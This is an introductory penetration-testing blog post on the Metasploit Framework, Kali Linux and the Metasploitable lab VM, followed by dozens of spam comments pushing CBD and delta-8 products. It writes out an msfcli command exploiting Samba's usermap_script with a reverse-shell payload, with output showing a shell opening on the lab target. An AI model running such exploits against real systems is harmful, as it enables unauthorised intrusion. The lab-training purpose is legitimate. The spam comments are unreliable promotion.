How to start with metasploit framework |penetration testing

What is Metasploit?

Start with metasploit framework

The Metasploit Framework (MSF) is far more than just a collection of exploits–it is also a solid foundation that you can build upon and easily customize to meet your needs. This allows you to concentrate on your unique target environment and not have to reinvent the wheel.

Metasploit is one of the single most useful security auditing tools freely available to security professionals today, all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment. Also, when speaking about Metasploit we can’t forget to speak about Kali Linux.  

What is Kali Linux?

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. It contains several hundred tools that are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering.

Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

you may like also how to install kali Linux properly

what is Metasploitable?

Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques.

The VM will run on any recent VMware products and other visualization technologies such as VirtualBox.

You can download the image file of Metasploitable 2 from SourceForge. Once you have downloaded the Metasploitable VM, extract the zip file, open up the .vmx file using your VMware product of choice, and power it on. Then after a brief time, the system will be booted and ready for action. The default login and password is msfadmin:msfadmin.

Metasploit Architecture

msf architecture

Metasploit is written in Ruby and has been in development for many years one can more easily understand the Metasploit architecture by taking a look under its hood.

In learning how to use Metasploit, take some time to make yourself familiar with its filesystem and libraries. In Kali Linux, Metasploit is provided in the Metasploit-framework package and is installed in the /usr/share/metasploit-framework directory, the top-level of which is shown below.

METASPLOIT OBJECT MODEL

msf-archictecture-2

In the Metasploit Framework, all modules are Ruby classes.

  • Modules inherit from the type-specific class
  • The type-specific class inherits from the Msf::Module class
  • There is a shared common API between modules

Payloads are slightly different.

  • Payloads are created at runtime from various components
  • Glue together stagers with stages

METASPLOIT INTERFACES

There are many different interfaces to use with this hacking tool, each with its own strengths and weaknesses. There is no one perfect interface to use with the Metasploit console, although the MSFConsole is the only supported way to access most Metasploit commands.

It is still beneficial, however, to be comfortable with all Metasploit interfaces.

you may want to install kali NetHunter on your android

What is the MSFcli?

The msfcli provides a powerful command line interface to the framework. This allows you to easily add Metasploit exploits into any scripts you may create.

Command Line Interface Commands

For msfcli help: type msfcli –h.

msf command example
help command msf

Note: when using msfcli, variables are assigned using the “equal to” operator = and that all options are case-sensitive.

root@kali:~# msfcli exploit/multi/samba/usermap_script RHOST=172.16.194.172 PAYLOAD=cmd/unix/reverse LHOST=172.16.194.163 E
[*] Please wait while we load the module tree...
       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 936 exploits - 500 auxiliary - 151 post
+ -- --=[ 252 payloads - 28 encoders - 8 nops
       =[ svn r15767 updated today (2012.08.22)
RHOST => 172.16.194.172
PAYLOAD > cmd/unix/reverse
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cSKqD83oiquo0xMr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "cSKqD83oiquo0xMr\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:57682) at 2012-06-14 09:58:19 -0400
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

If you aren’t entirely sure about what options belong to a particular module, you can append the letter O to the end of the string at whichever point you are stuck.

root@kali:~# msfcli exploit/multi/samba/usermap_script O
[*] Initializing modules...
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

To display available payloads for the current module, append the letter P to the msfcli command line string.

root@kali:~# msfcli exploit/multi/samba/usermap_script P
[*]Initializing modules...

Benefits of the MSFcli Interface

  • Supports the launching of exploits and auxiliary modules
  • Useful for specific tasks
  • Good for learning
  • Convenient to use when testing or developing a new exploit
  • Good tool for one-off exploitation
  • Excellent if you know exactly which exploit and options you need
  • Wonderful for use in scripts and basic automation

The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks.

It also doesn’t support any of the advanced automation features of msfconsole.

Closing words

congratulation you have reach the end hope now you know what metasploit is. if you hare having a question don’t keep for your self. share with us. for more information go offensive security official page

36 Responses

  1. best CBD oil says:

    Undeniably believe that which you stated. Your favourite
    justification appeared to be on the net the easiest thing to
    have in mind of. I say to you, I definitely get annoyed
    even as other folks consider concerns that they just do not recognise
    about. You controlled to hit the nail upon the top and
    defined out the entire thing with no need side effect , folks could take a signal.
    Will likely be again to get more. Thanks

  2. WOW just what I was searching for. Came here by searching for
    best CBD gummies

  3. anxiety says:

    You actually make it seem so easy with your presentation but I find this matter to be really something that I think
    I would never understand. It seems too complex and extremely broad for me.
    I am looking forward for your next post, I will try to get
    the hang of it!

  4. cbd gummies says:

    Thanks a lot for sharing this with all folks you really understand what you
    are speaking approximately! Bookmarked. Please also seek advice from my site =).
    We can have a link change agreement among us

  5. Usually I don’t learn article on blogs, but I would
    like to say that this write-up very pressured me
    to try and do so! Your writing taste has been surprised
    me. Thank you, very nice article.

  6. Excellent article! We are linking to this great content on our site.
    Keep up the good writing.

  7. CBD for sale says:

    Thank you, I have just been searching for info approximately this topic for a long
    time and yours is the best I’ve discovered so far. But,
    what in regards to the bottom line? Are you certain in regards to the supply?

  8. Dankon Ruzuba says:

    Thanks you cool

  9. You ought to be a part of a contest for one of the
    highest quality sites on the web. I’m going to recommend this site!

    Look at my website – CBD gummies for anxiety

  10. Excellent beat ! I would like to apprentice whilst you amend your web site, how can i subscribe for a weblog website?
    The account helped me a acceptable deal. I had been tiny bit
    acquainted of this your broadcast offered vivid transparent concept

    Look at my web blog … CBD gummies for sale

  11. Wow, that’s what I was seeking for, what a information! existing here at this webpage, thanks admin of this site.

    My web page … delta 8 thc carts near me

  12. magnificent issues altogether, you simply received a new reader.
    What would you recommend about your post that you
    simply made a few days ago? Any sure?

    my web site best delta 8 thc products

  13. My developer is trying to persuade me to move to .net from PHP.
    I have always disliked the idea because of the expenses.
    But he’s tryiong none the less. I’ve been using WordPress on various websites for about a year and am
    nervous about switching to another platform. I have heard good things about blogengine.net.
    Is there a way I can import all my wordpress
    posts into it? Any kind of help would be greatly appreciated!

    my blog post :: delta 8 thc products

  14. It’s really a great and helpful piece of information. I’m satisfied that you shared this helpful information with us.
    Please stay us informed like this. Thanks for sharing.

    Also visit my blog – best CBD gummies

  15. Simply wish to say your article is as astounding. The clarity
    to your post is just cool and that i could think you’re a professional on this subject.
    Fine together with your permission let me to snatch your feed
    to keep updated with coming near near post.
    Thanks a million and please keep up the enjoyable work.

    Feel free to visit my blog post where to buy CBD

  16. delta 8 says:

    Thanks for sharing your thoughts on delta 8.
    Regards

  17. Great post. I was checking continuously this weblog and I’m impressed!
    Very useful information specifically the ultimate section :
    ) I handle such info much. I was looking for this particular
    info for a long time. Thank you and good luck.

    Check out my web site CBD gummies for sale

  18. Hi, after reading this amazing paragraph i am as well delighted
    to share my experience here with colleagues.

    My web site – CBD gummies for sleep

  19. best CBD says:

    If some one desires to be updated with latest technologies therefore he must be visit this site and
    be up to date all the time.

    My blog post: best CBD

  20. best CBD says:

    Thank you for some other fantastic article. Where else may just anyone get that
    type of information in such an ideal manner of writing?
    I’ve a presentation subsequent week, and I’m at
    the look for such information.

    my web page – best CBD

  21. Awesome article.

    my blog post … delta 8 carts

  22. Thanks , I’ve just been searching for info approximately this
    topic for ages and yours is the best I have came upon so far.
    However, what about the conclusion? Are you certain in regards to
    the supply?

    Also visit my web site: Area 52 Delta 8 THC

  23. After checking out a few of the blog articles on your blog, I really
    like your way of writing a blog. I saved
    as a favorite it to my bookmark website list and will be checking
    back soon. Please visit my website as well and tell me what you think.

    Also visit my blog post: delta 8 carts

  24. It’s really a nice and helpful piece of info. I am happy that you simply shared
    this useful info with us. Please stay us up to date like this.

    Thanks for sharing.

    Stop by my blog post delta 8 carts

  25. best delta 8 says:

    This is my first time go to see at here and i am in fact happy to read all
    at alone place.

    Look at my web page … best delta 8

  26. Hi friends, how is all, and what you wish for to say regarding this piece of
    writing, in my view its truly awesome for me.

    Check out my website :: best delta 8 thc carts

  27. Touche. Solid arguments. Keep up the amazing work.

    My page – delta 8 THC for sale area 52

  28. Hey there! Do you know if they make any plugins to safeguard against
    hackers? I’m kinda paranoid about losing everything I’ve worked
    hard on. Any recommendations?

    My website; best delta 8 thc carts

  29. I read this paragraph completely concerning the comparison of hottest and previous
    technologies, it’s remarkable article.

    Also visit my blog; best delta 8 thc carts

  30. Hello! I know this is kinda off topic however I’d figured
    I’d ask. Would you be interested in exchanging links or maybe guest writing a blog post or vice-versa?
    My site discusses a lot of the same subjects as yours and
    I feel we could greatly benefit from each other.
    If you are interested feel free to send me an email.
    I look forward to hearing from you! Fantastic blog by the way!

    delta 8 area 52 – delta 8 area 52

    delta 8 area 52 – delta 8 THC for sale area 52

    Area 52 delta 8 carts – delta 8 THC area 52

    delta 8 area 52 – delta 8 area 52

    delta 8 THC area 52 – Area 52 Delta 8 THC

  31. I’m truly enjoying the design and layout of your
    website. It’s a very easy on the eyes which makes it much more
    enjoyable for me to come here and visit more often. Did you
    hire out a designer to create your theme? Superb work!

    delta 8 carts Area 52 – delta 8 carts Area 52

    delta 8 carts Area 52 – delta 8 THC for sale area 52

    area 52 delta 8 THC products – delta 8 THC area 52

    area 52 delta 8 THC products – buy delta 8 THC area 52

    delta 8 THC area 52 – Area 52 Delta 8 THC

  32. Fascinating blog! Is your theme custom made or did you download
    it from somewhere? A design like yours with a few simple tweeks would really make
    my blog shine. Please let me know where you got your
    theme. Bless you

    area 52 delta 8 THC products – area 52 delta 8 THC products

    area 52 delta 8 THC products – delta 8 THC area 52

    Area 52 delta 8 carts – delta 8 carts Area 52

    area 52 delta 8 THC products – delta 8 THC area 52

    Area 52 Delta 8 THC – area 52 delta 8 THC products

  33. best delta 8 says:

    I visit each day some web sites and sites to read articles,
    but this blog provides quality based writing.

    Also visit my webpage best delta 8

  1. 6 February 2021

    […] also youmay like to know about how to start with metasploit […]

  2. 15 March 2021

    […] You may also like How to start with metasploit framework […]

  3. 30 March 2021

    […] You may also like how to start with metasploit framework […]

Leave a Reply

Your email address will not be published. Required fields are marked *